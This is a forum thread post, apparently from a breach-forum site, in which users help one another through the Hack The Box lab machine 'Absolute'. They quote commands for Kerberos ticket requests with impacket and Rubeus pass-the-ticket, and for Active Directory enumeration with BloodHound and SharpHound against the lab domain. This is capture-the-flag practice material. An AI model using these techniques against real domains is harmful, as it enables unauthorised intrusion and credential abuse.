<div class="post_head">
<div class="float_right" style="vertical-align: top">
<!--<strong><a href="Thread-RaidForums-Official-Telegram?pid=538822#pid538822" title="RaidForums Official Telegram">#1</a></strong>-->
<div class="float_right" style="vertical-align: top">
<strong><a href="Thread-Absolute-HTB-Discussion?pid=538822#pid538822" title="RE: Absolute - HTB [Discussion]">#89</a></strong>
</div>
</div>
<span class="post_date"><span title="September 27, 2022, 05:41 PM">7 hours ago</span> <span class="post_edit" id="edited_by_538822"></span></span>
</div>
<div class="post_body scaleimages" id="pid_538822">
<blockquote class="mycode_quote"><cite><span> (<span title="September 27, 2022">Yesterday</span>, 10:52 AM)</span>ThatUsername Wrote:  <a class="quick_jump" href="https://breached.to/Thread-Absolute-HTB-Discussion?pid=535832#pid535832" rel="nofollow"></a></cite><blockquote class="mycode_quote"><cite><span> (<span title="September 27, 2022">Yesterday</span>, 09:03 AM)</span>user_htb22 Wrote:  <a class="quick_jump" href="https://breached.to/Thread-Absolute-HTB-Discussion?pid=535231#pid535231" rel="nofollow"></a></cite><blockquote class="mycode_quote"><cite><span> (<span title="September 27, 2022">Yesterday</span>, 08:48 AM)</span>ThatUsername Wrote:  <a class="quick_jump" href="https://breached.to/Thread-Absolute-HTB-Discussion?pid=535149#pid535149" rel="nofollow"></a></cite><blockquote class="mycode_quote"><cite><span> (<span title="September 27, 2022">Yesterday</span>, 07:16 AM)</span>user_htb22 Wrote:  <a class="quick_jump" href="https://breached.to/Thread-Absolute-HTB-Discussion?pid=534538#pid534538" rel="nofollow"></a></cite><blockquote class="mycode_quote"><cite><span> (<span title="September 27, 2022">Yesterday</span>, 06:43 AM)</span>Exa Wrote:  <a class="quick_jump" href="https://breached.to/Thread-Absolute-HTB-Discussion?pid=534310#pid534310" rel="nofollow"></a></cite>I got the same error, both with smbclient.py and crackmapexec. I made sure my clock is synchronized with the DC. Without synchronization I would get this error: KRB_AP_ERR_SKEW(Clock skew too great).<br>
<br>
These are the commands I used:<br>
<br/>
<div class="codeblock"><div class="body" dir="ltr"><code>sudo ntpdate absolute.htb<br/>
getTGT.py -dc-ip dc.absolute.htb absolute.htb/svc_smb:#########<br/>
export KRB5CCNAME=svc_smb.ccache<br/>
smbclient.py -dc-ip dc.absolute.htb -k absolute.htb</code></div></div><br/>
Does anyone has an idea why this is happening?</br></br></br></blockquote>timedatectl set-ntp false<br/>
sudo ntpdate absolute.htb<br/>
watch u r time<br/>
<br/>
smbclient won't work u need kerbores auth<br/>
<br/>
export KRB5CCNAME=svc_smb.ccache<br/>
use cme smb or impacket smbclient<br/>
<hr class="mycode_hr"/>
<blockquote class="mycode_quote"><cite><span> (September 26, 2022, 09:19 PM)</span>ThatUsername Wrote:  <a class="quick_jump" href="https://breached.to/Thread-Absolute-HTB-Discussion?pid=531279#pid531279" rel="nofollow"></a></cite>How did you collected the data? With every version of Bloodhound ingestor i ran into a "Failure to authenticate with LDAP". Using  and his password.<br/>
<br/>
Bloodhound.py | Sharphound.ps1 | Sharphound.exe<br/>
<br/>
is failing.</blockquote>i use this<br/>
<br/>
git clone <a class="mycode_url" href="https://github.com/jazzpizazz/BloodHound.py-Kerberos.git" rel="noopener" target="_blank">https://github.com/jazzpizazz/BloodHound...rberos.git</a><br/>
cd BloodHound.py-Kerberos/<br/>
export KRB5CCNAME=m.lovegod.ccache<br/>
./bloodhound.py -u m.lovegod -k -d absolute.htb -dc dc.absolute.htb -ns 10.129.214.131 --dns-tcp --zip -no-pass -c All</blockquote><br/>
yeah, tested this version too. Worked flawlessly.</blockquote>did u get winrm_user password ?</blockquote><br/>
No. Was able to get the bloodhound data and map the attack path but powerview won't connect to DC with my windows Maschine.<br/>
<br/>
Calculated aes256 hash of lovegod with rubeus an spawned powershell process with the ticket but no success to use it for ownership attacks. Even with valid session / ticket</blockquote>why dont u guys do in the windows vm , setup host file (C:\Windows\System32\drivers\etc\hosts) and then create tgt ticket with rubues (.\Rubeus.exe asktgt /enctype:AES256 /user:&lt;username&gt; /password:&lt;password&gt; /domain:absolute.htb /dc:dc.absolute.htb /ptt) and then  .\SharpHound.ps1; Invoke-BloodHound -Domain absolute.htb
				</div>
<div class="post_meta" id="post_meta_538822">
<div class="float_right">
</div>
</div>